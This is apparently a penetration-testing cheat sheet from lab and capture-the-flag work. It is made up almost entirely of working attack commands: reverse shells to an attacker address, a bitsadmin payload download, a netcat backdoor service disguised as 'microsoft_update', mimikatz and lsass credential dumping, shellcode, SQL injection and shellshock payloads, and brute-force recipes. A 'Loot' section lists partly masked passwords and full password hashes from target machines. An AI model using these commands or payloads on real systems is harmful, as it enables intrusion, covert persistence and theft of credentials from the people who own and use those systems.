### persistence [🡑](#tips)
```
add a new administrator user:
net user anderson cooper /add && net localgroup administrators anderson /add
add user to rdp group:
net localgroup "Remote Desktop Users" anderson /add
enable rdp in firewall:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
netsh firewall add portopening TCP <targetport> "RDP"
enable rdp via registry (requries reboot):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
is rdp service running:
tasklist /svc | findstr /c:TermService
start rdp service:
net start TermService
permanently enable rdp service:
sc config TermService start=auto
code:
useradd.c:
#include <stdlib.h>
int main() {
int i;
i=system("net user anderson cooper /add && net localgroup administrators anderson /add");
return 0;
}
add user:
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main() {
int i;
i=system("net user anderson cooper /add && net localgroup administrators anderson /add");
return 0;
}
# compile: i686-w64-mingw32-gcc -o useradd.exe useradd.c
```
### port forward [🡑](#tips)
```
socat:
socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80 &
socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 &
plink:
plink.exe -v -x -a -T -C -noagent -ssh -pw "<localpassword>" -R <targetport>:127.0.0.1:<targetport> <localuser>@<attackerip>
meterpreter:
# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter > portfwd add --l <targetport> --p <targetport> --r <targetip>
kali > rdesktop 127.0.0.1:<targetport>
```
### portknock [🡑](#tips)
```
knock once on port <targetport>/tcp:
hping3 <targetip> -S -p <targetport> -c 1
nc -vvvz <targetip> <targetport>
knock on multiple tcp ports in a given sequence:
hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3 <targetip> -S -p 8890 -c 1
nmap -Pn -sT -r -p666,7000,8890 <targetip>
```
### restricted shells [🡑](#tips)
```
rbash:
bash -i
BASH_CMDS[foobar]=/bin/bash;foobar
lshell:
echo os.system("/bin/bash")
```
### reverse shell [🡑](#tips)
```
reverse tcp shell from bash:
/bin/bash -i >& /dev/tcp/<targetip>/<attackerport> 0>&1
make a partially interactive terminal usable:
target: python -c "import pty; pty.spawn('/bin/bash')"
local:
stty raw -echo ; fg
target:
reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45 -columns 90 ; stty size
reverse php shell on windows:
https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php
```
### shellcode [🡑](#tips)
```
/bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
```
### shellshock [🡑](#tips)
```
look for /cgi-bin/ directory (incldue 403 code for gobuster scan)
check for scripts (-x sh,pl) using gobuster
test http header, user-agent probably
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh
gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403
gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl,py
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip>
```
### sql injection [🡑](#tips)
```
manual verification:
' or 1=1 -- -
' || 1=1 #
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
find a row where you can place your output:
http://<targetip>/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
get db version:
http://<targetip>/inj.php?id=1 union all select 1,2,3,@@version,5
get current user:
http://<targetip>/inj.php?id=1 union all select 1,2,3,user(),5
see all tables:
http://<targetip>/inj.php?id=1 union all select 1,2,3,table_name,5 from information_schema.tables
get column names for a specified table:
http://<targetip>/inj.php?id=1 union all select 1,2,3,column_name,5 from information_schema.columns where table_name='users'
concat user names and passwords:
http://<targetip>/inj.php?id=1 union all select 1,2,3,concat(name, 0x3a , password),5 from users
write to a file:
http://<targetip>/inj.php?id=1 union all select 1,2,3,"content",5 into outfile 'outfile'
```
### startup scripts [🡑](#tips)
```
chmod +x /foo/bar
update-rc.d /foo/bar defaults
```
### stegnography [🡑](#tips)
```
strings
exiftool
steghide
```
### tmux shortcuts [🡑](#tips)
```
prefix: ctrl + b
toggle logging: prefix + shift + p
screen cap: prefix + alt + p
complete history: prefix + alt + shift + p
```
### tunneling [🡑](#tips)
```
connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service on localhost, run a local standalone daemon on <targetport>:
proxytunnel -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234
ssh john@127.0.0.1 /bin/bash
vim /etc/proxychains.conf
http <targetip> <targetport>
proxychains nmap -sT -p22 <targetip>
proxychains ssh <username>@<targetip> /bin/bash
forward remote port to local address:
plink.exe -P 22 -l root -pw "<password>" -R 445:127.0.0.1:445 <targetip>
```
### windows useful commands [🡑](#tips)
```
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport> -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv <targetip> <targetport>
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full"
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe
powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```
<a name="tools"></a>
## 💥 Tools [↟](#contents)
### burp [🡑](#tools)
```
set an upstream proxy within burp:
burp > user options > upstream proxy > <targetip>:<targetport>
```
### cewl [🡑](#tools)
```
cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null
```
### fcrackzip [🡑](#tools)
```
fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip>
unzip -o -P "password" <file.zip>
```
### gobuster [🡑](#tools)
```
start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist
search file extension:
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php
gobuster dir -u http://<targetip>:<targetport>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp"
quick:
gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
full/comprehensive:
gobuster -s 200,204,301,302,307,403 -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
ippsec:
gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,403 -k -x txt,php,asp
gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl
cgi list:
/usr/share/seclists/Discovery/Web-Content/CGIs.txt
```
### hashcat [🡑](#tools)
```
hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt
```
### hydra [🡑](#tools)
```
generic:
hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip>
ftp:
hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ftp
http:
hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V
with cookie:
hydra -l user -P /usr/share/wordlists/rockyou.txt <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie: insert stuff here'
pop3:
hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> pop3
rdp:
hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<targetip>
smtp:
hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <targetip> smtp
ssh:
hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> ssh
hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ssh
hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword <targetip> ssh
wordpress:
hydra -l elliot -P ./fsocity.dic <targetip> http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR"
```
### john [🡑](#tools)
```
create custom wordlist:
john --wordlist=megacorpone-cewl --rules --stdout >megacorpone-cewl-jtr
crack shadow hashes:
unshadow passwd shadow >unshadowed ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john --show unshadowed
crack md5 hashes:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes
```
### kernel module [🡑](#tools)
```
rootkit:
https://github.com/PinkP4nther/Pinkit
```
### merlin c2 framework [🡑](#tools)
```
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>" -o merlinagentx64.exe main.go
go build -o merlinagent.elf main.go
```
### metasploit [🡑](#tools)
```
db_status
load mimiktaz
msfconsole -q
msfdb init
msfdb start
search <string>
set payload windows/x86/meterpreter/reverse_tcp
set verbose true
show advanced
show options
show payloads
show targets
systemctl start postgresql
systemctl status postgresql
wdigest
```
### msfvenom [🡑](#tools)
```
linux bind tcp shellcode:
msfvenom -p linux/x86/shell_bind_tcp lport=4444 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai
windows reverse tcp shellcode:
msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -b "\x00\x0a\x0d" -f c -a x86 --platform windows -e x86/shikata_ga_nai
revere tcp shellcode for client-side exploit without any encoder:
msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -f js_le --platform windows -a x86 -e generic/none
php reverse meterpreter:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f raw -o shell.php
php reverse shell:
msfvenom -p php/reverse_php LHOST=<targetip> LPORT=80 -f raw -o reverse.php
java war reverse shell:
msfvenom -p java/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war
windows javascript reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f js_le -e generic/none -n 18
windows powershell reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
linux reverse tcp shell elf shared object file:
msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport> -o linux-shell-reverse-tcp.so
```
### netcat [🡑](#tools)
```
bind:
nc -lvp <attackerport>
connect:
nc -nv <targetip> <attackerport>
reverse:
nc -e /bin/bash <targetip> <attackerport>
```
### ncrack [🡑](#tools)
```
bruteforce rdp login:
ncrack -vv --user administrator -P passwords.txt rdp://<targetip>
```
### netdiscover [🡑](#tools)
```
netdiscover -r 192.168.92.0/24
```
### nikto [🡑](#tools)
```
nikto -h http://<targetip>
nikto -C all -h http://IP
nikto -h <targetip> -useproxy http://<targetip>:3128
```
### nmap [🡑](#tools)
```
vulners nse script:
https://github.com/vulnersCom/nmap-vulners
searchsploit-like vuln scan:
nmap --script vulners --script-args mincvss=5.0 <targetip>
ping sweep:
nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap | grep Up | cut -d" " -f2
quick tcp:
nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap <targetip>
quick udp:
nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip>
full/intensive tcp:
nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip>
full/intensive udp:
nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip>
smb bruteforce:
nmap --script=smb-brute.nse <targetip>
nmap -sV -p 445 --script smb-brute <targetiprange>
```
### openssl [🡑](#tools)
```
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate valid for 7 days
openssl req -new -key caca.key -out caca.csr ## create a new certificate signing request (csr)
openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ## generate new certificate
openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate pkcs12 certificate
```
### searchsploit [🡑](#tools)
```
nmap service scan output -> searchsploit:
nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml
```
### socat [🡑](#tools)
```
socat file:`tty`,raw,echo=0 tcp-listen:<attackerport>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport>
```
### sqlmap [🡑](#tools)
```
avoid prompts, use defaults:
sqlmap --batch
read http request from a text file (request captured from burp, useful for POST requests) and use it to start scan:
sqlmap -r searchform.txt --dbs --batch
sqlmap -r searchform.txt -D webapphacking --dump-all --batch
post requests:
sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST
intrusive scans:
sqlmap --level 5 --risk 3
list databses:
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs
list tables within a database:
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables
dump a table:
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --dump
blind sql enumeration:
sqlmap -u "http://<targetip>:<targetport>/index.php" --forms --dbs
```
### steghide [🡑](#tools)
```
steghide extract -sf file.jpg
```
### unicornscan [🡑](#tools)
```
scan all 64k ports:
unicornscan -vmT <targetip>:a
scan first 1k ports:
unicornscan -vmT <targetip>:p
scan in udp mode:
unicornscan -vmU <targetip>
```
### wfuzz [🡑](#tools)
```
enumerate directories:
wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php"
wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ
wfuzz -w common.txt -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t 50 http://<targetip>:4488/FUZZ
enumerate directories and filter on response length:
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ
bruteforce password:
bruteforce a single list:
wfuzz -w pwds.db -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php
bruteforce multiple lists:
wfuzz -w pwds.db -w pins.txt -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php
bruteforce multiple lists, but faster:
wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php
wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ' --hh 45,41 http://<targetip>:<targetport>/login.php
```
<a name="loot"></a>
## 🔥 Loot [↟](#contents)
<a name="credentials"></a>
### 🔑 Credentials [🡑](#loot)
| # | Username | Password | Type |
|---|----------|----------|------|
| 1. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ftp` |
| 2. | `veronica` | `babygirl_veronica07@yah......` | `ftp` |
| 3. | `eric` | `ericdoesntdrinkhiso.....` | `ftp` |
| 4. | `Balrog` | `Mell..` | `ftp` |
| 5. | `eezeepz` | `keKkeKKeKKeKkE....` | `http` |
| 6. | `john` | `MyNameIsJ...` | `liggoat` |
| 7. | `robert` | `ADGAdsafdfwt4gadf....` | `liggoat` |
| 8. | `dreg` | `Mast..` | `lotuscms` |
| 9. | `loneferret` | `starwa..` | `lotuscms` |
| 10. | `admin` | `kEjdbRigfBHUREi....` | `mysql` |
| 11. | `john` | `thiscannotb...` | `mysql` |
| 12. | `wpdbuser` | `meErKa..` | `mysql` |
| 13. | `mysql` | `mysql@12...` | `mysql` |
| 14. | `admin` | `3298fj8323j80d....` | `mysql` |
| 15. | `wordpress` | `Oscp1234..` | `mysql` |
| 16. | `john` | `hiroshi..` | `mysql` |
| 17. | `root` | `fuckey..` | `mysql` |
| 18. | `Admin` | `TogieMYSQL123....` | `mysql` |
| 19. | `root` | `darkshad..` | `mysql` |
| 20. | `sql_svc` | `M3g4c0rp...` | `sql` |
| 21. | `administrator` | `MEGACORP_4dm....` | `ssh` |
| 22. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ssh` |
| 23. | `pi` | `raspber..` | `ssh` |
| 24. | `fox` | `12345..` | `ssh` |
| 25. | `eric` | `triscui..` | `ssh` |
| 26. | `anne` | `prince..` | `ssh` |
| 27. | `graham` | `GSo7isUM...` | `ssh` |
| 28. | `root` | `1234.` | `ssh` |
| 29. | `admin` | `thisisalsopw...` | `ssh` |
| 30. | `fristigod` | `LetThereBeFri....` | `ssh` |
| 31. | `dreg` | `Mast..` | `ssh` |
| 32. | `loneferret` | `starwa..` | `ssh` |
| 33. | `john` | `MyNameIsJ...` | `ssh` |
| 34. | `robert` | `ADGAdsafdfwt4gadf....` | `ssh` |
| 35. | `togie` | `1234.` | `ssh` |
| 36. | `bob` | `secr..` | `ssh` |
| 37. | `susan` | `MySuperS3cretVa....` | `ssh` |
| 38. | `insecurity` | `P@ssw0..` | `ssh` |
| 39. | `smeagol` | `MyPreciousR...` | `ssh` |
| 40. | `Ori` | `span..` | `ssh` |
| 41. | `robot` | `abcdefghijklmnopqrstu.....` | `ssh` |
| 42. | `mark` | `5AYRft73VtFp....` | `ssh` |
| 43. | `wpadmin` | `wpadm..` | `ssh` |
| 44. | `root` | `rootpasswo...` | `ssh` |
| 45. | `user` | `letme..` | `ssh` |
| 46. | `tomcat` | `submitthisforpo....` | `tomcat` |
| 47. | | `execrab..` | `truecrypt` |
| 48. | `rascal` | `lov.` | `webapp` |
| 49. | `user1` | `hell.` | `webapp` |
| 50. | `user2` | `comman..` | `webapp` |
| 51. | `user3` | `p@ssw0..` | `webapp` |
| 52. | `test` | `testte..` | `webapp` |
| 53. | `superadmin` | `Uncracka...` | `webapp` |
| 54. | `test1` | `testte..` | `webapp` |
| 55. | `admin` | `5afac8d8..` | `webapp` |
| 56. | `john` | `66lajGGb..` | `webapp` |
| 57. | `frodo` | `iwilltakethe....` | `webapp` |
| 58. | `smeagol` | `MyPreciousR...` | `webapp` |
| 59. | `aragorn` | `AndMySwo..` | `webapp` |
| 60. | `legolas` | `AndMyB..` | `webapp` |
| 61. | `gimli` | `AndMyA..` | `webapp` |
| 62. | `myP14ceAdm1nAcc0uNT` | `manchest..` | `webapp` |
| 63. | `tom` | `spongeb..` | `webapp` |
| 64. | `mark` | `snowfla..` | `webapp` |
| 65. | `john` | `enig..` | `wordpress` |
| 66. | `mark` | `helpdesk..` | `wordpress` |
| 67. | | `admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2........` | `wordpress` |
| 68. | `admin` | `TogieMYSQL123....` | `wordpress` |
| 69. | `elliot` | `ER28-06..` | `wordpress` |
| 70. | `admin` | `admi.` | `wordpress` |
<a name="hashes"></a>
### 🔑 Hashes [🡑](#loot)
| # | Hash |
|---|------|
| 1. | `abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::` |
| 2. | `admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::` |
| 3. | `Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::` |
| 4. | `Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::` |
| 5. | `anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::` |
| 6. | `anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::` |
| 7. | `arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::` |
| 8. | `ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::` |
| 9. | `Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::` |
| 10. | `billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::` |
| 11. | `bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::` |
| 12. | `bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::` |
| 13. | `brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::` |
| 14. | `crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::` |
| 15. | `doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::` |
| 16. | `dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::` |
| 17. | `eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::` |
| 18. | `eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::` |
| 19. | `fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::` |
| 20. | `graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::` |
| 21. | `Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::` |
| 22. | `hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::` |
| 23. | `harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::` |
| 24. | `harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::` |
| 25. | `Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::` |
| 26. | `IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::` |
| 27. | `IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::` |
| 28. | `jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::` |
| 29. | `john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::` |
| 30. | `john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::` |
| 31. | `john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::` |
| 32. | `john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::` |
| 33. | `klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::` |
| 34. | `Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::` |
| 35. | `loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::` |
| 36. | `loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::` |
| 37. | `mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::` |
| 38. | `makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::` |
| 39. | `mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::` |
| 40. | `mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::` |
| 41. | `mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::` |
| 42. | `notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::` |
| 43. | `noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::` |
| 44. | `Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::` |
| 45. | `oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::` |
| 46. | `peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::` |
